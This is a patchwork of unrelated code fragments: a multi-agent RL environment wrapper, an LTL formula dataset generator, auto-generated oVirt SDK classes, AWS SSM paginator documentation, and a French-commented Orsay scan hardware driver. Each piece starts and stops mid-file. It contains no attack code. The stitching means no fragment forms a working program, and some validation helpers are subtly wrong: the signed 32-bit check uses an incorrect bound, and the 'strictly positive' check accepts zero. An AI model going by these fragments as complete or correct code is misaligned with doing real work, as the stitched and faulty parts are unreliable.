env = wrappers.OrderEnforcingWrapper(env)
return env
parallel_env = parallel_wrapper_fn(env)
class raw_env(AECEnv, EzPickle):
# class env(MultiAgentEnv):
metadata = {'render.modes': ['human', "rgb_array"]}
def __init__(self, **kwargs):
EzPickle.__init__(self, **kwargs)
self._kwargs = kwargs
self.seed()
self.agents = self.env.agents[:]
self.possible_agents = self.agents[:]
self._agent_selector = agent_selector(self.agents)
self.agent_selection = self._agent_selector.reset()
# spaces
self.action_spaces = dict(zip(self.agents, self.env.action_space))
self.observation_spaces = dict(zip(self.agents, self.env.observation_space))
# dicts
self.observations = {}
self.rewards = self.env.rewards
self.dones = self.env.dones
| |
<filename>impl/dlsgs/data_generation/generator.py
#!python3.7
# implementation based on DeepLTL https://github.com/reactive-systems/deepltl
# pylint: disable=line-too-long
from __future__ import generator_stop # just to be safe with python 3.7
import sys, os, re
import signal
import datetime
import argparse
import random
import json
from tensorflow.io import gfile # pylint: disable=import-error
from dlsgs.utils import ltl_parser, utils
from dlsgs.data_generation.ltl import solve_ltl
from dlsgs.data_generation.prop import solve_prop
class DistributionGate():
# interval: [a, b]
def __init__(self, key, distribution, interval, total_num, **kwargs):
# optional: start_calc_at together with alpha
self.dist = {}
self.targets = {}
self.fulls = {}
self.key = key
self.interval = interval
self.alpha = kwargs['alpha'] if 'alpha' in kwargs else 0.0
self.distribution = distribution
bleft, bright = interval
if key == 'formula size':
self.bins = list(range(bleft, bright + 1))
self.get_val = lambda x: x.size()
else:
raise ValueError()
for b in self.bins:
self.dist[b] = 0
if distribution == 'uniform':
if 'start_calc_from' in kwargs:
start = kwargs['start_calc_from']
self.enforced_bins = list(
filter(lambda x: x >= start, self.bins))
else:
self.enforced_bins = self.bins
num_actual_bins = len(self.enforced_bins)
for b in self.bins:
self.targets[b] = total_num * \
(1 - self.alpha) / num_actual_bins
self.fulls[b] = self.dist[b] >= self.targets[b]
elif distribution == 'arbitrary':
pass
else:
raise ValueError()
def gate(self, formula_obj: ltl_parser.LTLFormula) -> bool:
val = self.get_val(formula_obj)
if val < self.interval[0] or val > self.interval[1]: # not in range
return False
if self.distribution == 'arbitrary':
return True
else:
return not self.fulls[val]
def update(self, formula_obj: ltl_parser.LTLFormula):
val = self.get_val(formula_obj)
if val >= self.interval[0] and val <= self.interval[1]:
self.dist[val] += 1
if self.distribution != 'arbitrary' and self.dist[val] >= self.targets[val]:
self.fulls[val] = True
def histogram(self, show=True, save_to=None):
import matplotlib.pyplot as plt
figure, axis = plt.subplots(1)
counts = [val for key, val in sorted(self.dist.items())]
axis.bar(self.bins, counts, width=1,
color='#3071ff', edgecolor='white')
axis.set_ylabel('number of items')
axis.set_xlabel(self.key)
axis.title.set_text('alpha = ' + str(self.alpha))
if save_to is not None:
figure.savefig(save_to)
if show:
plt.show()
else:
plt.close(figure)
def full(self) -> bool:
if self.distribution == 'arbitrary':
return False
else:
return all([self.fulls[eb] for eb in self.enforced_bins])
def generate_examples(params, pers_worker):
interrupted = False
def signal_handler(signal, frame):
nonlocal interrupted
print(f"Received signal {signal:d}, interrupting generation")
interrupted = True
signal.signal(signal.SIGINT, signal_handler)
if params.token_format['variables'] == 'alphabetical':
if params.num_variables > 26:
raise ValueError("Cannot generate more than 26 APs")
variables = list(map(chr, range(97, 97 + params.num_variables)))
elif params.token_format['variables'] == 'p_numeric':
variables = list(f'p{q:d}' for q in range(params.num_variables))
if not isinstance(params.tree_size, tuple):
params.tree_size = (1, params.tree_size)
if params.formula_generator == 'spot':
import spot
token_dist = re.sub(r'ap=[!]', 'ap={}'.format(len(variables)), params.token_dist)
if params.problem == 'ltl':
formula_generator = spot.randltl(variables, seed=params.seed, tree_size=params.tree_size, output='ltl', ltl_priorities=token_dist, simplify=0)
elif params.problem == 'prop':
formula_generator = spot.randltl(variables, seed=params.seed, tree_size=params.tree_size, output='bool', boolean_priorities=token_dist, simplify=0)
else:
raise ValueError()
elif params.formula_generator == 'spec_patterns':
assert params.problem == 'ltl'
from dlsgs.data_generation.spec_patterns import SpecPatternGen
class SpecPatternGenWrapper:
def __next__(self):
d = SpecPatternGen(variables, params.tree_size)
return d.run()
formula_generator = SpecPatternGenWrapper()
elif params.formula_generator == 'dac_patterns':
assert params.problem == 'ltl'
assert params.token_format['variables'] == 'alphabetical'
from dlsgs.data_generation.general_patterns import GeneralPatternGenerator
formula_generator = GeneralPatternGenerator('dac', variables, params.tree_size)
else:
raise ValueError()
tictoc = utils.TicToc()
dist_gate = DistributionGate('formula size', params.formula_dist, params.tree_size, params.num_examples, start_calc_from=10, alpha=params.alpha)
# generate samples
print('Generating examples...')
examples = []
timeout_formulas = []
sat_examples = 0
unsat_examples = 0
total_examples = 0
dropped_sat_examples = 0
dropped_unsat_examples = 0
dropped_dist_examples = 0
dropped_timeout_examples = 0
time_started = datetime.datetime.now()
last_msg_time = time_started
last_msg_percent = 0
accu = { k : 0 for k in {'model_count', 'model_poss', 'model_frac', 'log_model_count', 'log_model_poss', 'log_model_frac', 'in_length', 'out_length', 'solve_time'}}
if params.include_solver_statistics and params.problem == 'ltl' and params.ltl_solver == 'leviathan':
accu.update({k : 0 for k in ['lev_evtls', 'lev_frames', 'lev_steps', 'lev_max_model_size', 'lev_max_depth']})
info = {'max_in_length' : 0, 'max_out_length' : 0}
while True:
current_percent = total_examples / params.num_examples * 100
now = datetime.datetime.now()
if current_percent - last_msg_percent >= params.log_each_x_percent or now - last_msg_time > datetime.timedelta(hours=1):
last_msg_percent = current_percent
last_msg_time = now
print("Generated {:,d} of {:,d} examples ({:4.1f}%); dropped {:,d} sat, {:,d} unsat, {:,d} dist, {:,d} timeout; at {:s} runtime".format(total_examples,
params.num_examples, current_percent, dropped_sat_examples, dropped_unsat_examples, dropped_dist_examples, dropped_timeout_examples, utils.strfdelta_hms(now - time_started)))
sys.stdout.flush()
if total_examples >= params.num_examples:
#print(f'Terminated: Generated specified amount of examples ({total_examples}).')
break
if dist_gate.full():
#print(f'Terminated: Distribution is full.')
break
if interrupted:
#print(f'Terminated: Interrupted.')
break
if params.max_runtime != 0.0 and (now - time_started).total_seconds() > params.max_runtime:
print('Exiting due to exceeded runtime')
break
tictoc.tic()
formula = next(formula_generator)
if not isinstance(formula, ltl_parser.LTLFormula):
if not isinstance(formula, str):
if formula is None:
continue # only case: dac_patterns max_size too small
formula = formula.to_str()
formula_obj = ltl_parser.ltl_formula(formula, 'spot')
else:
formula_obj = formula
tictoc.toc('formula generation')
if not dist_gate.gate(formula_obj): # formula doesn't fit distribution
dropped_dist_examples += 1
continue
if formula == '1': # special case, currently not handled by all solvers (leviathan)
continue
tictoc.tic()
if params.problem == 'ltl':
is_sat, witness, d = solve_ltl(formula_obj, params.ltl_solver, pers_worker, timeout=params.timeout, simplify=False, no_disjunctions=True, witness='witness' in params.subproblem, binary_path=params.binary_dir)
elif params.problem == 'prop':
is_sat, witness, d = solve_prop(formula_obj, params.prop_solver, params.solution_choice, simplify=True, count_models=params.include_log_model_count, model_counting=params.model_counting, binary_path=params.binary_dir)
tictoc.toc('solving')
if is_sat is None: # due to timeout
# print('Trace generation timed out ({:d}s) for formula {}'.format(int(timeout), formula_obj.to_str('spot')))
if params.require_solved:
if params.save_timeouts:
timeout_formulas.append(formula_obj.to_str('spot', spacing='all ops', full_parens=True))
dropped_timeout_examples += 1
continue
else: # no solved required
# TODO how to count? for now, just do not increment specifc counter (only total at end)
witness_str = ''
dist_gate.update(formula_obj)
elif not is_sat and params.require_sat:
dropped_unsat_examples += 1
continue
elif not is_sat and not params.require_sat: # unsat
if (params.frac_unsat is not None) and unsat_examples >= params.frac_unsat * params.num_examples:
dropped_unsat_examples += 1
continue
else: # more unsat samples needed
witness_str = '0'
dist_gate.update(formula_obj)
unsat_examples += 1
else: # is_sat
if not params.require_sat and (params.frac_unsat is not None) and sat_examples >= (1 - params.frac_unsat) * params.num_examples:
dropped_sat_examples += 1
continue
elif random.random() < params.drop_sat_prob:
# don't log
continue
else: # more sat samples needed
if params.problem == 'ltl':
if 'witness' in params.subproblem:
witness_str = witness.to_str('network-' + params.operator_notation)
else:
witness_str = '1'
out_length = len(witness_str)
elif params.problem == 'prop':
assert not params.solution_choice == 'all'
# todo: format in case of trivial?
if True in witness:
witness_str = '1'
else:
witness_str = ''.join([var.name + str(int(val)) for (var, val) in sorted(witness.items(), key=lambda x:x[0].name)])
out_length = len(witness_str)
info['max_out_length'] = max(info['max_out_length'], out_length)
accu['out_length'] += out_length
dist_gate.update(formula_obj)
sat_examples += 1
for k, v in d.items():
if k in accu:
accu[k] += v
in_length = formula_obj.size()
info['max_in_length'] = max(info['max_in_length'], in_length)
accu['in_length'] += in_length
formula_str = formula_obj.to_str('network-' + params.operator_notation)
examples.append((formula_str, witness_str, d))
total_examples += 1
if params.problem == 'prop' and params.include_log_model_count:
print('sat ex', sat_examples)
info['avg_model_count'] = accu['model_count'] / sat_examples
info['avg_model_poss'] = accu['model_poss'] / sat_examples
info['avg_model_percent'] = accu['model_count'] / accu['model_poss'] * 100
info['avg_model_pre_percent'] = accu['model_frac'] / sat_examples * 100
print('Average model count: {avg_model_count:.1f} / {avg_model_poss:.1f} (post {avg_model_percent:.1f}%, pre {avg_model_pre_percent:.1f}%)'.format(**info))
info['avg_log_model_count'] = accu['log_model_count'] / sat_examples
info['avg_log_model_poss'] = accu['log_model_poss'] / sat_examples
info['avg_log_model_percent'] = accu['log_model_count'] / accu['log_model_poss'] * 100
info['avg_log_model_pre_percent'] = accu['log_model_frac'] / sat_examples * 100
print('Average log model count: {avg_log_model_count:.1f} / {avg_log_model_poss:.1f} (post {avg_log_model_percent:.1f}%; pre {avg_log_model_pre_percent:.1f}%)'.format(**info))
if params.include_solve_time:
info['avg_solve_time'] = accu['solve_time'] / total_examples
print('Average solve time: {avg_solve_time:.2f} ms'.format(**info))
if params.include_solver_statistics and params.problem == 'ltl' and params.ltl_solver == 'leviathan':
for k in ['lev_evtls', 'lev_frames', 'lev_steps', 'lev_max_model_size', 'lev_max_depth']:
info['avg_' + k] = accu[k] / total_examples
print('Average leviathan statistics: {avg_lev_evtls:.1f} eventualities, {avg_lev_frames:.1f} frames, {avg_lev_steps:.1f} steps, {avg_lev_max_model_size:.1f} max model size, {avg_lev_max_depth:.1f} max depth'.format(**info))
info['avg_in_length'] = accu['in_length'] / total_examples
info['avg_out_length'] = accu['out_length'] / sat_examples
info['runtime'] = utils.strfdelta_hms(datetime.datetime.now() - time_started)
info['_dist_gate'] = dist_gate
info['_tictoc'] = tictoc
info['examples_generated'] = total_examples
info['examples_generated_sat'] = sat_examples
info['examples_generated_unsat'] = unsat_examples
print('Average formula length {avg_in_length:.1f} and witness length {avg_out_length:.1f}'.format(**info))
print('Generated {:d} examples ({:d} sat, {:d} unsat). {:d} requested.'.format(total_examples, sat_examples, unsat_examples, params.num_examples))
return examples, timeout_formulas, info
def split_and_write(examples, timeouts, params, log_dict):
random.Random(params.seed).shuffle(examples)
num_examples = len(examples)
res = {}
total_val = sum(params.splits.values())
current_val = 0.0
for split, val in params.splits.items():
res[split] = examples[int(current_val/total_val * num_examples) : int((current_val + val)/total_val * num_examples)]
current_val += val
assert params.file_format == 'text/2lines'
if params.include_simplified_formula:
log_dict['file_format'] += '+simplified_formula'
if params.include_log_model_count:
log_dict['file_format'] += '+log_model_count'
try:
if params.solution_choice == 'all':
log_dict['file_format'] += '+all_solutions'
except AttributeError:
pass # so sorry
if params.include_solve_time:
log_dict['file_format'] += '+solve_time'
if params.include_solver_statistics:
log_dict['file_format'] += '+solver_statistics'
print(f'Writing dataset of {num_examples} to {params.output_dir}...')
gfile.makedirs(params.output_dir)
for split, data in res.items():
path = os.path.join(params.output_dir, split + '.txt')
with gfile.GFile(path, 'w') as f:
for ex_in, ex_out, d in data:
f.write(ex_in)
if params.include_simplified_formula:
f.write(' #simplified_formula: ' + d['simplified_formula'].to_str('network-'+ params.operator_notation))
| |
permits(self):
"""
Returns the value of the `permits` property.
"""
return self._permits
@permits.setter
def permits(self, value):
"""
Sets the value of the `permits` property.
"""
self._permits = value
@property
def user(self):
"""
Returns the value of the `user` property.
"""
return self._user
@user.setter
def user(self, value):
"""
Sets the value of the `user` property.
"""
Struct._check_type('user', value, User)
self._user = value
class SchedulingPolicy(Identified):
def __init__(
self,
balances=None,
comment=None,
default_policy=None,
description=None,
filters=None,
id=None,
locked=None,
name=None,
properties=None,
weight=None,
):
super(SchedulingPolicy, self).__init__(
comment=comment,
description=description,
id=id,
name=name,
)
self.balances = balances
self.default_policy = default_policy
self.filters = filters
self.locked = locked
self.properties = properties
self.weight = weight
@property
def balances(self):
"""
Returns the value of the `balances` property.
"""
return self._balances
@balances.setter
def balances(self, value):
"""
Sets the value of the `balances` property.
"""
self._balances = value
@property
def default_policy(self):
"""
Returns the value of the `default_policy` property.
"""
return self._default_policy
@default_policy.setter
def default_policy(self, value):
"""
Sets the value of the `default_policy` property.
"""
self._default_policy = value
@property
def weight(self):
"""
Returns the value of the `weight` property.
"""
return self._weight
@weight.setter
def weight(self, value):
"""
Sets the value of the `weight` property.
"""
self._weight = value
@property
def filters(self):
"""
Returns the value of the `filters` property.
"""
return self._filters
@filters.setter
def filters(self, value):
"""
Sets the value of the `filters` property.
"""
self._filters = value
@property
def locked(self):
"""
Returns the value of the `locked` property.
"""
return self._locked
@locked.setter
def locked(self, value):
"""
Sets the value of the `locked` property.
"""
self._locked = value
@property
def properties(self):
"""
Returns the value of the `properties` property.
"""
return self._properties
@properties.setter
def properties(self, value):
"""
Sets the value of the `properties` property.
"""
self._properties = value
class SchedulingPolicyUnit(Identified):
def __init__(
self,
comment=None,
description=None,
enabled=None,
id=None,
internal=None,
name=None,
properties=None,
type=None,
):
super(SchedulingPolicyUnit, self).__init__(
comment=comment,
description=description,
id=id,
name=name,
)
self.enabled = enabled
self.internal = internal
self.properties = properties
self.type = type
@property
def internal(self):
"""
Returns the value of the `internal` property.
"""
return self._internal
@internal.setter
def internal(self, value):
"""
Sets the value of the `internal` property.
"""
self._internal = value
@property
def type(self):
"""
Returns the value of the `type` property.
"""
return self._type
@type.setter
def type(self, value):
"""
Sets the value of the `type` property.
"""
Struct._check_type('type', value, PolicyUnitType)
self._type = value
@property
def enabled(self):
"""
Returns the value of the `enabled` property.
"""
return self._enabled
@enabled.setter
def enabled(self, value):
"""
Sets the value of the `enabled` property.
"""
self._enabled = value
@property
def properties(self):
"""
Returns the value of the `properties` property.
"""
return self._properties
@properties.setter
def properties(self, value):
"""
Sets the value of the `properties` property.
"""
self._properties = value
class SeLinux(Struct):
def __init__(
self,
mode=None,
):
super(SeLinux, self).__init__(
)
self.mode = mode
@property
def mode(self):
"""
Returns the value of the `mode` property.
"""
return self._mode
@mode.setter
def mode(self, value):
"""
Sets the value of the `mode` property.
"""
Struct._check_type('mode', value, SeLinuxMode)
self._mode = value
class SerialNumber(Struct):
def __init__(
self,
policy=None,
value=None,
):
super(SerialNumber, self).__init__(
)
self.policy = policy
self.value = value
@property
def policy(self):
"""
Returns the value of the `policy` property.
"""
return self._policy
@policy.setter
def policy(self, value):
"""
Sets the value of the `policy` property.
"""
Struct._check_type('policy', value, SerialNumberPolicy)
self._policy = value
@property
def value(self):
"""
Returns the value of the `value` property.
"""
return self._value
@value.setter
def value(self, value):
"""
Sets the value of the `value` property.
"""
self._value = value
class Session(Identified):
def __init__(
self,
comment=None,
console_user=None,
description=None,
id=None,
ip=None,
name=None,
protocol=None,
user=None,
vm=None,
):
super(Session, self).__init__(
comment=comment,
description=description,
id=id,
name=name,
)
self.console_user = console_user
self.ip = ip
self.protocol = protocol
self.user = user
self.vm = vm
@property
def ip(self):
"""
Returns the value of the `ip` property.
"""
return self._ip
@ip.setter
def ip(self, value):
"""
Sets the value of the `ip` property.
"""
Struct._check_type('ip', value, Ip)
self._ip = value
@property
def vm(self):
"""
Returns the value of the `vm` property.
"""
return self._vm
@vm.setter
def vm(self, value):
"""
Sets the value of the `vm` property.
"""
Struct._check_type('vm', value, Vm)
self._vm = value
@property
def console_user(self):
"""
Returns the value of the `console_user` property.
"""
return self._console_user
@console_user.setter
def console_user(self, value):
"""
Sets the value of the `console_user` property.
"""
self._console_user = value
@property
def user(self):
"""
Returns the value of the `user` property.
"""
return self._user
@user.setter
def user(self, value):
"""
Sets the value of the `user` property.
"""
Struct._check_type('user', value, User)
self._user = value
@property
def protocol(self):
"""
Returns the value of the `protocol` property.
"""
return self._protocol
@protocol.setter
def protocol(self, value):
"""
Sets the value of the `protocol` property.
"""
self._protocol = value
class SkipIfConnectivityBroken(Struct):
def __init__(
self,
enabled=None,
threshold=None,
):
super(SkipIfConnectivityBroken, self).__init__(
)
self.enabled = enabled
self.threshold = threshold
@property
def threshold(self):
"""
Returns the value of the `threshold` property.
"""
return self._threshold
@threshold.setter
def threshold(self, value):
"""
Sets the value of the `threshold` property.
"""
self._threshold = value
@property
def enabled(self):
"""
Returns the value of the `enabled` property.
"""
return self._enabled
@enabled.setter
def enabled(self, value):
"""
Sets the value of the `enabled` property.
"""
self._enabled = value
class SkipIfSdActive(Struct):
def __init__(
self,
enabled=None,
):
super(SkipIfSdActive, self).__init__(
)
self.enabled = enabled
@property
def enabled(self):
"""
Returns the value of the `enabled` property.
"""
return self._enabled
@enabled.setter
def enabled(self, value):
"""
Sets the value of the `enabled` property.
"""
self._enabled = value
class SpecialObjects(Struct):
def __init__(
self,
blank_template=None,
root_tag=None,
):
super(SpecialObjects, self).__init__(
)
self.blank_template = blank_template
self.root_tag = root_tag
@property
def blank_template(self):
"""
Returns the value of the `blank_template` property.
"""
return self._blank_template
@blank_template.setter
def blank_template(self, value):
"""
Sets the value of the `blank_template` property.
"""
Struct._check_type('blank_template', value, Template)
self._blank_template = value
@property
def root_tag(self):
"""
Returns the value of the `root_tag` property.
"""
return self._root_tag
@root_tag.setter
def root_tag(self, value):
"""
Sets the value of the `root_tag` property.
"""
Struct._check_type('root_tag', value, Tag)
self._root_tag = value
class Spm(Struct):
def __init__(
self,
priority=None,
status=None,
):
super(Spm, self).__init__(
)
self.priority = priority
self.status = status
@property
def priority(self):
"""
Returns the value of the `priority` property.
"""
return self._priority
@priority.setter
def priority(self, value):
"""
Sets the value of the `priority` property.
"""
self._priority = value
@property
def status(self):
"""
Returns the value of the `status` property.
"""
return self._status
@status.setter
def status(self, value):
"""
Sets the value of the `status` property.
"""
Struct._check_type('status', value, SpmStatus)
self._status = value
class Ssh(Identified):
def __init__(
self,
authentication_method=None,
comment=None,
description=None,
fingerprint=None,
id=None,
name=None,
port=None,
public_key=None,
user=None,
):
super(Ssh, self).__init__(
comment=comment,
description=description,
id=id,
name=name,
)
self.authentication_method = authentication_method
self.fingerprint = fingerprint
self.port = port
self.public_key = public_key
self.user = user
@property
def authentication_method(self):
"""
Returns the value of the `authentication_method` property.
"""
return self._authentication_method
@authentication_method.setter
def authentication_method(self, value):
"""
Sets the value of the `authentication_method` property.
"""
Struct._check_type('authentication_method', value, SshAuthenticationMethod)
self._authentication_method = value
@property
def port(self):
"""
Returns the value of the `port` property.
"""
return self._port
@port.setter
def port(self, value):
"""
Sets the value of the `port` property.
"""
self._port = value
@property
def user(self):
"""
Returns the value of the `user` property.
"""
return self._user
@user.setter
def user(self, value):
"""
Sets the value of the `user` property.
"""
Struct._check_type('user', value, User)
self._user = value
@property
def public_key(self):
"""
Returns the value of the `public_key` property.
"""
return self._public_key
@public_key.setter
def public_key(self, value):
"""
Sets the value of the `public_key` property.
"""
self._public_key = value
@property
def fingerprint(self):
"""
Returns the value of the `fingerprint` property.
"""
return self._fingerprint
@fingerprint.setter
def fingerprint(self, value):
"""
Sets the value of the `fingerprint` property.
"""
self._fingerprint = value
class SshPublicKey(Identified):
def __init__(
self,
comment=None,
content=None,
description=None,
id=None,
name=None,
user=None,
):
super(SshPublicKey, self).__init__(
comment=comment,
description=description,
id=id,
name=name,
)
self.content = content
self.user = user
@property
def user(self):
"""
Returns the value of the `user` property.
"""
return self._user
@user.setter
def user(self, value):
"""
Sets the value of the `user` property.
"""
Struct._check_type('user', value, User)
| |
The default value is Abort.
- **MaxAttempts** *(integer) --*
The maximum number of tries to run the action of the step. The default value is 1.
- **ExecutionStartTime** *(datetime) --*
If a step has begun execution, this contains the time the step started. If the step is in Pending status, this field is not populated.
- **ExecutionEndTime** *(datetime) --*
If a step has finished execution, this contains the time the execution ended. If the step has not yet concluded, this field is not populated.
- **StepStatus** *(string) --*
The execution status for this step. Valid values include: Pending, InProgress, Success, Cancelled, Failed, and TimedOut.
- **ResponseCode** *(string) --*
The response code returned by the execution of the step.
- **Inputs** *(dict) --*
Fully-resolved values passed into the step before execution.
- *(string) --*
- *(string) --*
- **Outputs** *(dict) --*
Returned values from the execution of the step.
- *(string) --*
- *(list) --*
- *(string) --*
- **Response** *(string) --*
A message associated with the response code for an execution.
- **FailureMessage** *(string) --*
If a step failed, this message explains why the execution failed.
- **FailureDetails** *(dict) --*
Information about the Automation failure.
- **FailureStage** *(string) --*
The stage of the Automation execution when the failure occurred. The stages include the following: InputValidation, PreVerification, Invocation, PostVerification.
- **FailureType** *(string) --*
The type of Automation failure. Failure types include the following: Action, Permission, Throttling, Verification, Internal.
- **Details** *(dict) --*
Detailed information about the Automation step failure.
- *(string) --*
- *(list) --*
- *(string) --*
- **StepExecutionId** *(string) --*
The unique ID of a step execution.
- **OverriddenParameters** *(dict) --*
A user-specified list of parameters to override when running a step.
- *(string) --*
- *(list) --*
- *(string) --*
- **IsEnd** *(boolean) --*
The flag which can be used to end automation no matter whether the step succeeds or fails.
- **NextStep** *(string) --*
The next step after the step succeeds.
- **IsCritical** *(boolean) --*
The flag which can be used to help decide whether the failure of current step leads to the Automation failure.
- **ValidNextSteps** *(list) --*
Strategies used when step fails, we support Continue and Abort. Abort will fail the automation when the step fails. Continue will ignore the failure of current step and allow automation to run the next step. With conditional branching, we add step:stepName to support the automation to go to another specific step.
- *(string) --*
- **Targets** *(list) --*
The targets for the step execution.
- *(dict) --*
An array of search criteria that targets instances using a Key,Value combination that you specify. ``Targets`` is required if you don't provide one or more instance IDs in the call.
- **Key** *(string) --*
User-defined criteria for sending commands that target instances that meet the criteria. ``Key`` can be ``tag:<Amazon EC2 tag>`` or ``InstanceIds`` . For more information about how to send commands that target instances using ``Key,Value`` parameters, see `Using Targets and Rate Controls to Send Commands to a Fleet <https://docs.aws.amazon.com/systems-manager/latest/userguide/send-commands-multiple.html#send-commands-targeting>`__ in the *AWS Systems Manager User Guide* .
- **Values** *(list) --*
User-defined criteria that maps to ``Key`` . For example, if you specified ``tag:ServerRole`` , you could specify ``value:WebServer`` to run a command on instances that include Amazon EC2 tags of ``ServerRole,WebServer`` . For more information about how to send commands that target instances using ``Key,Value`` parameters, see `Using Targets and Rate Controls to Send Commands to a Fleet <https://docs.aws.amazon.com/systems-manager/latest/userguide/send-commands-multiple.html>`__ in the *AWS Systems Manager User Guide* .
- *(string) --*
- **TargetLocation** *(dict) --*
The combination of AWS Regions and accounts targeted by the current Automation execution.
- **Accounts** *(list) --*
The AWS accounts targeted by the current Automation execution.
- *(string) --*
- **Regions** *(list) --*
The AWS Regions targeted by the current Automation execution.
- *(string) --*
- **TargetLocationMaxConcurrency** *(string) --*
The maxium number of AWS accounts and AWS regions allowed to run the Automation concurrently
- **TargetLocationMaxErrors** *(string) --*
The maxium number of errors allowed before the system stops queueing additional Automation executions for the currently running Automation.
- **ExecutionRoleName** *(string) --*
The Automation execution role used by the currently running Automation.
:type AutomationExecutionId: string
:param AutomationExecutionId: **[REQUIRED]**
The Automation execution ID for which you want step execution descriptions.
:type Filters: list
:param Filters:
One or more filters to limit the number of step executions returned by the request.
- *(dict) --*
A filter to limit the amount of step execution information returned by the call.
- **Key** *(string) --* **[REQUIRED]**
One or more keys to limit the results. Valid filter keys include the following: StepName, Action, StepExecutionId, StepExecutionStatus, StartTimeBefore, StartTimeAfter.
- **Values** *(list) --* **[REQUIRED]**
The values of the filter key.
- *(string) --*
:type ReverseOrder: boolean
:param ReverseOrder:
A boolean that indicates whether to list step executions in reverse order by start time. The default value is false.
:type PaginationConfig: dict
:param PaginationConfig:
A dictionary that provides parameters to control pagination.
- **MaxItems** *(integer) --*
The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
- **PageSize** *(integer) --*
The size of each page.
- **StartingToken** *(string) --*
A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
:rtype: dict
:returns:
"""
pass
class DescribeAvailablePatches(Paginator):
def paginate(self, Filters: List = None, PaginationConfig: Dict = None) -> Dict:
"""
Creates an iterator that will paginate through responses from :py:meth:`SSM.Client.describe_available_patches`.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/ssm-2014-11-06/DescribeAvailablePatches>`_
**Request Syntax**
::
response_iterator = paginator.paginate(
Filters=[
{
'Key': 'string',
'Values': [
'string',
]
},
],
PaginationConfig={
'MaxItems': 123,
'PageSize': 123,
'StartingToken': 'string'
}
)
**Response Syntax**
::
{
'Patches': [
{
'Id': 'string',
'ReleaseDate': datetime(2015, 1, 1),
'Title': 'string',
'Description': 'string',
'ContentUrl': 'string',
'Vendor': 'string',
'ProductFamily': 'string',
'Product': 'string',
'Classification': 'string',
'MsrcSeverity': 'string',
'KbNumber': 'string',
'MsrcNumber': 'string',
'Language': 'string'
},
],
}
**Response Structure**
- *(dict) --*
- **Patches** *(list) --*
An array of patches. Each entry in the array is a patch structure.
- *(dict) --*
Represents metadata about a patch.
- **Id** *(string) --*
The ID of the patch (this is different than the Microsoft Knowledge Base ID).
- **ReleaseDate** *(datetime) --*
The date the patch was released.
- **Title** *(string) --*
The title of the patch.
- **Description** *(string) --*
The description of the patch.
- **ContentUrl** *(string) --*
The URL where more information can be obtained about the patch.
- **Vendor** *(string) --*
The name of the vendor providing the patch.
- **ProductFamily** *(string) --*
The product family the patch is applicable for (for example, Windows).
- **Product** *(string) --*
The specific product the patch is applicable for (for example, WindowsServer2016).
- **Classification** *(string) --*
The classification of the patch (for example, SecurityUpdates, Updates, CriticalUpdates).
- **MsrcSeverity** *(string) --*
The severity of the patch (for example Critical, Important, Moderate).
- **KbNumber** *(string) --*
The Microsoft Knowledge Base ID of the patch.
- **MsrcNumber** *(string) --*
The ID of the MSRC bulletin the patch is related to.
- **Language** *(string) --*
The language of the patch if it's language-specific.
:type Filters: list
:param Filters:
Filters used to scope down the returned patches.
- *(dict) --*
Defines a filter used in Patch Manager APIs.
- **Key** *(string) | |
= cproduct.value
self._revision = crevision.value
self._serialnumber = cserialnumber.value
self._major = cmajor.value
self._minor = cminor.value
if self._major < 5:
raise AttributeError("No device connected")
self.__drift_tube = {"offset": 0.0, "gain": 1.0/10.0, "range": {"min":-10.0, "max":10.0}, "value": 0.0}
drift_tube = {"offset": 0.002, "gain": 1.0/5.005}
self.drift_tube_calibration = drift_tube
def close(self):
self.__OrsayScanClose(self.orsayscan)
self.orsaycamera = None
def __verifyUnsigned32Bit(self, value):
"""
Check if value is in range 0 <= value <= 0xffffffff
"""
if(value < 0 or value > 0xffffffff):
raise AttributeError("Argument out of range (must be 32bit unsigned).")
def __verifySigned32Bit(self, value):
"""
Check if value is in range 0 <= value <= 0xffffffff
"""
if(value < 0x8000000 or value > 0x7fffffff):
raise AttributeError("Argument out of range (must be 32bit signed).")
def __verifyPositiveInt(self, value):
"""
Check if value is in range 0 <= value <= 0xffffffff
"""
if(value < 0 or value > 0x7fffffff):
raise AttributeError("Argument out of range (must be positive 32bit signed).")
def __verifyStrictlyPositiveInt(self, value):
"""
Check if value is in range 0 < value <= 0xffffffff
"""
if(value < 0 or value > 0x7fffffff):
raise AttributeError("Argument out of range (must be positive 32bit signed).")
def getInputsCount(self) -> int:
"""
Donne le nombre d'entrées vidéo actives
"""
return self.__OrsayScangetInputsCount(self.orsayscan)
def getInputProperties(self, input : int) -> (int, float, str, int):
"""
Lit les propriétés de l'entrée vidéo
Retourne 3 valeurs: bool vrai si unipolaire, double offset, string nom, index de l'entrée.
"""
unipolar = c_bool()
offset = c_double()
buffer = _createCharBuffer23(100)
res = self.__OrsayScanGetInputProperties(self.orsayscan, input, byref(unipolar), byref(offset), buffer)
return unipolar.value, offset.value, _convertToString23(buffer.value), input
def setInputProperties(self, input : int, unipolar : bool, offset : float) -> bool:
"""
change les propriétés de l'entrée vidéo
Pour le moment, seul l'offset est utilisé.
"""
res =self.__OrsayScanSetInputProperties(self.orsayscan, input, offset)
if (not res):
raise Exception("Failed to set orsayscan input properties")
return res
def GetImageTime(self) -> float:
"""
Donne le temps effectif de la durée de balayage d'une image
"""
return self.__OrsayScanGetImageTime(self.orsayscan, self.gene)
def SetInputs(self, inputs : []) -> bool:
"""
Choisit les entrées à lire.
A cause d'une restriction hardware, les valeurs possibles sont 1, 2, 4, 6, 8
"""
inputarray = (c_int * len(inputs))()
k = 0
while (k < len(inputs)):
inputarray[k] = inputs[k]
k = k +1
return self.__OrsayScanSetInputs(self.orsayscan, self.gene, len(inputarray), inputarray)
def GetInputs(self) ->(int, []):
"""
Donne la liste des entrées utilisées
"""
inputarray = (c_int * 20)()
nbinputs = self.__OrsayScanGetInputs(self.orsayscan, self.gene, inputarray)
inputs = []
for inp in range(0, nbinputs):
inputs.append(inputarray[inp])
return nbinputs, inputs
def setImageSize(self, sizex : int, sizey : int) -> bool:
"""
Définit la taille de l'image en pixels
Les limites de dimension sont 1 et 8192
"""
self.__verifyPositiveInt(sizex)
self.__verifyPositiveInt(sizey)
res = self.__OrsayScansetImageSize(self.orsayscan, self.gene, sizex, sizey)
if (not res):
raise Exception("Failed to set orsayscan image size")
def getImageSize(self) -> (int, int):
"""
Donne la taille de l'image
*** il est impératif que le tableau passé à la callback ait cette taille
